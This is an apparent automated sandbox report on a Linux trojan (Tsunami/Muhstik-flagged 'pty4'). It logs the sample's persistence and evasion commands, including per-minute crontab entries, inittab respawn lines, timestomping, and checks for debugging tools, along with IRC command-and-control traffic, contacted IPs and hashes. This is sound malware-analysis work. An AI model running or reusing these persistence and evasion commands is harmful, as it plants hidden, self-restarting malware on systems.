Source: /bin/sh (PID: 5235)	Crontab executable: /usr/bin/crontab -> crontab -r	Jump to behavior
Source: /bin/sh (PID: 5232)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5240)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5239)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5257)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5264)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5263)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5278)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5284)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5283)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5298)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5305)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5304)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5320)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5326)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5325)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior

Source: /usr/bin/cp (PID: 5252)	File written: /dev/shm/pty4	Jump to dropped file
Source: /usr/bin/cp (PID: 5272)	File written: /var/tmp/pty4	Jump to dropped file
Source: /usr/bin/cp (PID: 5292)	File written: /run/lock/pty4	Jump to dropped file
Source: /usr/bin/cp (PID: 5314)	File written: /run/pty4	Jump to dropped file

Source: /bin/sh (PID: 5233)	Grep executable: /usr/bin/grep -> grep /tmp/pty4	Jump to behavior
Source: /bin/sh (PID: 5234)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5231)	Grep executable: /usr/bin/grep -> grep -v /tmp/pty4	Jump to behavior
Source: /bin/sh (PID: 5259)	Grep executable: /usr/bin/grep -> grep /dev/shm/pty4	Jump to behavior
Source: /bin/sh (PID: 5260)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5258)	Grep executable: /usr/bin/grep -> grep -v /dev/shm/pty4	Jump to behavior
Source: /bin/sh (PID: 5279)	Grep executable: /usr/bin/grep -> grep /var/tmp/pty4	Jump to behavior
Source: /bin/sh (PID: 5280)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5277)	Grep executable: /usr/bin/grep -> grep -v /var/tmp/pty4	Jump to behavior
Source: /bin/sh (PID: 5299)	Grep executable: /usr/bin/grep -> grep /var/lock/pty4	Jump to behavior
Source: /bin/sh (PID: 5300)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5297)	Grep executable: /usr/bin/grep -> grep -v /var/lock/pty4	Jump to behavior
Source: /bin/sh (PID: 5321)	Grep executable: /usr/bin/grep -> grep /var/run/pty4	Jump to behavior
Source: /bin/sh (PID: 5322)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5319)	Grep executable: /usr/bin/grep -> grep -v /var/run/pty4	Jump to behavior

Source: /usr/bin/crontab (PID: 5239)	Crontab like entry written: /var/spool/cron/crontabs/tmp.X7EnDn	Jump to dropped file
Source: /usr/bin/crontab (PID: 5263)	Crontab like entry written: /var/spool/cron/crontabs/tmp.qptud8	Jump to dropped file
Source: /usr/bin/crontab (PID: 5283)	Crontab like entry written: /var/spool/cron/crontabs/tmp.sabPpE	Jump to dropped file
Source: /usr/bin/crontab (PID: 5304)	Crontab like entry written: /var/spool/cron/crontabs/tmp.ySVvsi	Jump to dropped file
Source: /usr/bin/crontab (PID: 5325)	Crontab like entry written: /var/spool/cron/crontabs/tmp.EDmAaQ	Jump to dropped file

Source: /tmp/pty4 (PID: 5219)	Shell command executed: sh -c "pidof -x strace > /dev/null"	Jump to behavior
Source: /tmp/pty4 (PID: 5221)	Shell command executed: sh -c "pidof -x tcpdump > /dev/null"	Jump to behavior
Source: /tmp/pty4 (PID: 5227)	Shell command executed: sh -c "crontab -r"	Jump to behavior
Source: /tmp/pty4 (PID: 5229)	Shell command executed: sh -c "crontab -l \| grep /tmp/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /tmp/pty4 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty4 (PID: 5228)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/tmp/pty4\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5237)	Shell command executed: sh -c "echo \"0:2345:respawn:/tmp/pty4\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5241)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5243)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5245)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5249)	Shell command executed: sh -c "cp -f /tmp/pty4 /dev/shm/pty4"	Jump to behavior
Source: /tmp/pty4 (PID: 5255)	Shell command executed: sh -c "crontab -l \| grep /dev/shm/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /dev/shm/pty4 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty4 (PID: 5254)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/dev/shm/pty4\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5261)	Shell command executed: sh -c "echo \"0:2345:respawn:/dev/shm/pty4\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5265)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5267)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5269)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5271)	Shell command executed: sh -c "cp -f /tmp/pty4 /var/tmp/pty4"	Jump to behavior
Source: /tmp/pty4 (PID: 5275)	Shell command executed: sh -c "crontab -l \| grep /var/tmp/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/tmp/pty4 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty4 (PID: 5274)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/tmp/pty4\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5281)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/tmp/pty4\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5285)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5287)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5289)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5291)	Shell command executed: sh -c "cp -f /tmp/pty4 /var/lock/pty4"	Jump to behavior
Source: /tmp/pty4 (PID: 5295)	Shell command executed: sh -c "crontab -l \| grep /var/lock/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/lock/pty4 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty4 (PID: 5294)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/lock/pty4\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5301)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/lock/pty4\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5302)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5307)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5311)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5313)	Shell command executed: sh -c "cp -f /tmp/pty4 /var/run/pty4"	Jump to behavior
Source: /tmp/pty4 (PID: 5317)	Shell command executed: sh -c "crontab -l \| grep /var/run/pty4 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/run/pty4 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty4 (PID: 5316)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/run/pty4\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5323)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/run/pty4\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5327)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5329)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty4 (PID: 5331)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty4 (PID: 5250)	Shell command executed: sh -c "/bin/uname -n"	Jump to behavior

Source: /bin/sh (PID: 5244)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5268)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5288)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5310)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5330)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior

Source: /bin/sh (PID: 5246)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5270)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5290)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5312)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5332)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior

Source: submitted sample

Stderr: cat: /etc/inittabno crontab for root: No such file or directoryno crontab for rootno crontab for root: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: IRC traffic on port 48714 -> 8080
Source: unknown	Network traffic detected: IRC traffic on port 48714 -> 8080

Source: /bin/uname (PID: 5251)

Queries kernel information via 'uname':

Jump to behavior

Stealing of Sensitive Information:

Yara detected Muhstik

Show sources

Source: Yara match	File source: 5315.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5293.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5253.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5273.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5218.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5226.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5225.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY

Yara detected Tsunami

Show sources

Source: Yara match	File source: 5315.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5293.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5253.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5273.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5218.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5226.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5225.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pty4 PID: 5218, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5225, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5226, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5247, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5253, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5273, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5293, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5315, type: MEMORYSTR

Remote Access Functionality:

Yara detected Muhstik

Show sources

Source: Yara match	File source: 5315.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5293.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5253.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5273.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5218.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5226.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5225.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY

Yara detected Tsunami

Show sources

Source: Yara match	File source: 5315.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5293.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5253.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5273.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5218.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5226.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5225.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.000000001a887bdc.000000000b831e49.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pty4 PID: 5218, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5225, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5226, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5247, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5253, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5273, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5293, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty4 PID: 5315, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job11	Scheduled Task/Job11	Scheduled Task/Job11	Scripting1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	At (Linux)1	At (Linux)1	Timestomp1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)1	Logon Script (Windows)	Logon Script (Windows)	Indicator Removal on Host1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pty4	37%	Virustotal		Browse
pty4	44%	ReversingLabs	Linux.Trojan.Tsunami

Dropped Files

Source	Detection	Scanner	Label	Link
/dev/shm/pty4	37%	Virustotal		Browse
/dev/shm/pty4	44%	ReversingLabs	Linux.Trojan.Tsunami
/run/lock/pty4	37%	Virustotal		Browse
/run/lock/pty4	44%	ReversingLabs	Linux.Trojan.Tsunami
/run/pty4	37%	Virustotal		Browse
/run/pty4	44%	ReversingLabs	Linux.Trojan.Tsunami
/var/tmp/pty4	37%	Virustotal		Browse
/var/tmp/pty4	44%	ReversingLabs	Linux.Trojan.Tsunami

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
l.deutschland-zahlung.net	unknown	unknown	true		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
198.8.91.14	unknown	United States	46562	TOTAL-SERVER-SOLUTIONSUS	false
156.67.220.165	unknown	Cyprus	47583	AS-HOSTINGERLT	true
23.95.222.119	unknown	United States	36352	AS-COLOCROSSINGUS	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Runtime Messages

Command:	/tmp/pty4
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	cat: /etc/inittabno crontab for root : No such file or directory no crontab for root no crontab for root

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
156.67.220.165	pty4	Get hash	malicious	Browse
23.95.222.119	ju6Wbtio60	Get hash	malicious	Browse
	RvDKaRDE3k	Get hash	malicious	Browse
	20DMSKyJbk	Get hash	malicious	Browse
	HrNNgx1ZG7	Get hash	malicious	Browse
	UZBQyM62Oc	Get hash	malicious	Browse
	z6jmJpo1pX	Get hash	malicious	Browse
	Cq2ydpw3Tf	Get hash	malicious	Browse
	8qoiarDkDC	Get hash	malicious	Browse
	4Ks3mBzVng	Get hash	malicious	Browse
	H5V4UsjFzH	Get hash	malicious	Browse
	Pe3HHKmZE6	Get hash	malicious	Browse
	ovVhfBgkQl	Get hash	malicious	Browse
109.202.202.202	ju6Wbtio60	Get hash	malicious	Browse
	RvDKaRDE3k	Get hash	malicious	Browse
	20DMSKyJbk	Get hash	malicious	Browse
	HrNNgx1ZG7	Get hash	malicious	Browse
	UZBQyM62Oc	Get hash	malicious	Browse
	z6jmJpo1pX	Get hash	malicious	Browse
	Cq2ydpw3Tf	Get hash	malicious	Browse
	8qoiarDkDC	Get hash	malicious	Browse
	4Ks3mBzVng	Get hash	malicious	Browse
	H5V4UsjFzH	Get hash	malicious	Browse
	Pe3HHKmZE6	Get hash	malicious	Browse
	ovVhfBgkQl	Get hash	malicious	Browse
	5kVsQcLDDh	Get hash	malicious	Browse
	3zO446cx2s	Get hash	malicious	Browse
	2X6QIRRS4l	Get hash	malicious	Browse
	oewnQ6R3TQ	Get hash	malicious	Browse
	3C78SULNtd	Get hash	malicious	Browse
	AVXhknAf97	Get hash	malicious	Browse
	qUcT4ggKE9	Get hash	malicious	Browse
	IEzsOmUGST	Get hash	malicious	Browse
91.189.91.43	ju6Wbtio60	Get hash	malicious	Browse
	RvDKaRDE3k	Get hash	malicious	Browse
	20DMSKyJbk	Get hash	malicious	Browse
	HrNNgx1ZG7	Get hash	malicious	Browse
	UZBQyM62Oc	Get hash	malicious	Browse
	z6jmJpo1pX	Get hash	malicious	Browse
	Cq2ydpw3Tf	Get hash	malicious	Browse
	8qoiarDkDC	Get hash	malicious	Browse
	4Ks3mBzVng	Get hash	malicious	Browse
	H5V4UsjFzH	Get hash	malicious	Browse
	Pe3HHKmZE6	Get hash	malicious	Browse
	ovVhfBgkQl	Get hash	malicious	Browse
	5kVsQcLDDh	Get hash	malicious	Browse
	3zO446cx2s	Get hash	malicious	Browse
	2X6QIRRS4l	Get hash	malicious	Browse
	oewnQ6R3TQ	Get hash	malicious	Browse
	3C78SULNtd	Get hash	malicious	Browse
	AVXhknAf97	Get hash	malicious	Browse
	qUcT4ggKE9	Get hash	malicious	Browse
	IEzsOmUGST	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOTAL-SERVER-SOLUTIONSUS	DOC_100492538964482834455.xlsm	Get hash	malicious	Browse	66.115.183.137
	DOC_100492538964482834455.xlsm	Get hash	malicious	Browse	66.115.183.137
	arm7	Get hash	malicious	Browse	192.111.221.22
	N64GUd01yF	Get hash	malicious	Browse	45.74.33.20
	eh.arm	Get hash	malicious	Browse	208.93.194.82
	MZrHQA8fxF.exe	Get hash	malicious	Browse	107.152.108.114
	ohEMBJb57C.exe	Get hash	malicious	Browse	107.152.108.114
	MKsnmEA7gF	Get hash	malicious	Browse	192.111.221.77
	Payment Advice.exe	Get hash	malicious	Browse	107.152.108.114
	SMS EMAILER_45_.exe	Get hash	malicious	Browse	107.152.108.114
	Account Details differs.exe	Get hash	malicious	Browse	107.152.108.114
	New order PO.exe	Get hash	malicious	Browse	107.152.108.114
	IN7REq0Jv5	Get hash	malicious	Browse	195.123.127.199
	whaxbkJxne	Get hash	malicious	Browse	69.50.143.210
	wXGm2SnAnh	Get hash	malicious	Browse	208.84.155.41
	FeDEx AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	66.154.111.3
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	66.154.111.3
	sora.x86	Get hash	malicious	Browse	208.93.194.83
	g95wD5xjWu	Get hash	malicious	Browse	199.187.218.16
	KaD8AA8MRW.exe	Get hash	malicious	Browse	107.152.99.41
AS-COLOCROSSINGUS	ORDINE-102109916.exe	Get hash	malicious	Browse	23.94.54.224
	ju6Wbtio60	Get hash	malicious	Browse	23.95.222.119
	RvDKaRDE3k	Get hash	malicious	Browse	23.95.222.119
	20DMSKyJbk	Get hash	malicious	Browse	23.95.222.119
	HrNNgx1ZG7	Get hash	malicious	Browse	23.95.222.119
	UZBQyM62Oc	Get hash	malicious	Browse	23.95.222.119
	z6jmJpo1pX	Get hash	malicious	Browse	23.95.222.119
	Cq2ydpw3Tf	Get hash	malicious	Browse	23.95.222.119
	8qoiarDkDC	Get hash	malicious	Browse	23.95.222.119
	4Ks3mBzVng	Get hash	malicious	Browse	23.95.222.119
	H5V4UsjFzH	Get hash	malicious	Browse	23.95.222.119
	Pe3HHKmZE6	Get hash	malicious	Browse	23.95.222.119
	ovVhfBgkQl	Get hash	malicious	Browse	23.95.222.119
	mE1GaB2o7j.exe	Get hash	malicious	Browse	23.94.54.224
	TTYCopy.xlsx	Get hash	malicious	Browse	104.168.32.9
	ql3aCllzTu	Get hash	malicious	Browse	23.95.222.185
	rkWGEjNx20	Get hash	malicious	Browse	23.95.222.185
	sxArTxFTEJ	Get hash	malicious	Browse	23.95.222.185
	KJn3EX6nzw	Get hash	malicious	Browse	23.95.222.185
	b4DA95P8k7	Get hash	malicious	Browse	23.95.222.185
AS-HOSTINGERLT	1POs12.doc	Get hash	malicious	Browse	2.57.90.16
	pty4	Get hash	malicious	Browse	156.67.220.165
	pty1	Get hash	malicious	Browse	45.132.242.233
	gNHWpkzcZ2	Get hash	malicious	Browse	153.92.4.31
	bWWYiK6e8P	Get hash	malicious	Browse	153.92.4.31
	02tGmRk9B8	Get hash	malicious	Browse	153.92.4.31
	ZcxVQiqSNT	Get hash	malicious	Browse	153.92.4.31
	SKM6197534BT New Order.xlsx	Get hash	malicious	Browse	2.57.90.16
	RFQ - Mopcoms Turkey .xlsx	Get hash	malicious	Browse	45.130.228.232
	Logo Embroidery-Auto Inquiry.xlsx	Get hash	malicious	Browse	31.170.167.224
	AUCAe6w7Nm.exe	Get hash	malicious	Browse	31.170.167.224
	Request for Quotation - 4RFQ001247.xlsx	Get hash	malicious	Browse	31.170.167.224
	Quotation for Urgent PO 110921.exe	Get hash	malicious	Browse	2.57.90.16
	j1MTWQvoZS.exe	Get hash	malicious	Browse	31.170.167.224
	fhs2UR1fSG.exe	Get hash	malicious	Browse	2.57.90.16
	PO 211213-0221A.exe	Get hash	malicious	Browse	193.168.192.133
	GHPYl58St4.exe	Get hash	malicious	Browse	31.170.167.224
	DHL SHIPMENT ADDRESS.xlsx	Get hash	malicious	Browse	31.170.167.224
	Aviso 9858.xlsm	Get hash	malicious	Browse	37.44.244.177

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/dev/shm/pty4 Download File
Process:	/usr/bin/cp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	44884
Entropy (8bit):	7.871246036237381
Encrypted:	false
SSDEEP:	768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p
MD5:	7B4F1C79F1EDCB6B36A92DEBD5A81B96
SHA1:	0193F962CF141AFD8BE8D5D252AC7C2511138860
SHA-256:	601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6
SHA-512:	D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 44%
Reputation:	low
Preview:	.ELF....................p...4...........4. ...(....................................................................................j...j......a........?d..ELF.......d...m...4..h.. .(.....~m..-.#..5...c...............m.$..R...Q.td...............H.45.......I......U..S.......?E...x...[]......$..+....=`....t...o..5..............u........t.+.h..........!.}o.8..S..&$U*T....w.Z..D.;.Rj.hd-u.g@.~......_.;.b......1.....^....PTRhx\|@....QVhO..d.........E.F..v....6.U..............j..%>.k..H.............;.}..~..}....JW......g..W.....1......]......E.%.zo........3..R......g.....1..y......z...^T}1.]...)....d..H....Q6...P%C...U2T..P%C. U2T.$(%C..,02T.P48C..U<@,..%U.D..... +...e...;..[]M.%$.>P.1T.@<P.PeC8.4.U2T0,P%C.(U2T.$ %C....2T.P..C..U....P%.P.Y$.MEU..X.M$.}.P~....B.`P......l....-..y..........;=u_.M.o...]...4.e.QS....PY.zEu3[........n.v..............=.>......&.u..;k...($.?~.f..o..............!..}..5F.....a....T\U5"d..#........aa.V.,&......G.1H..X.~.7..Bq..jH.......m..,..

/etc/inittab Download File
Process:	/usr/bin/cat
File Type:	ASCII text
Category:	dropped
Size (bytes):	142
Entropy (8bit):	4.326664977926882
Encrypted:	false
SSDEEP:	3:IQfXzstufXPXzsm3V6vVfXPXzsqsRufXPXzsqjKYbfXPXzsqz:IQr/x3+V/I8/rb/f
MD5:	BD60346A01F1B4BDE9993A6BAA8183A2
SHA1:	EC6A317AD472790B18D0B662AC6992E226041C3E
SHA-256:	53ACA2A49A912146645BBB47D0ABB1827520434ABB907CADF77BC55B2572B099
SHA-512:	C960E7D898096547CECEE2376226203F2EF9AE88185B6AD52A4ECAC742AA60C1EA699FC167A86201B9BC0102F029ACC296C8A7BCD4E9F5793D5310CDB4FAA098
Malicious:	true
Reputation:	low
Preview:	0:2345:respawn:/tmp/pty4.0:2345:respawn:/dev/shm/pty4.0:2345:respawn:/var/tmp/pty4.0:2345:respawn:/var/lock/pty4.0:2345:respawn:/var/run/pty4.

/etc/inittab2 Download File
Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.090234012145145
Encrypted:	false
SSDEEP:	3:IQfXzsqz:IQP
MD5:	D36AF1B2908091A8DCAADAED98DC9460
SHA1:	47189FCB10685324FAA8DEF45669F784444479BB
SHA-256:	79A96E3165984BE3826784DA22D53CFCA134C75E87E394D3A35876FBEEEA610C
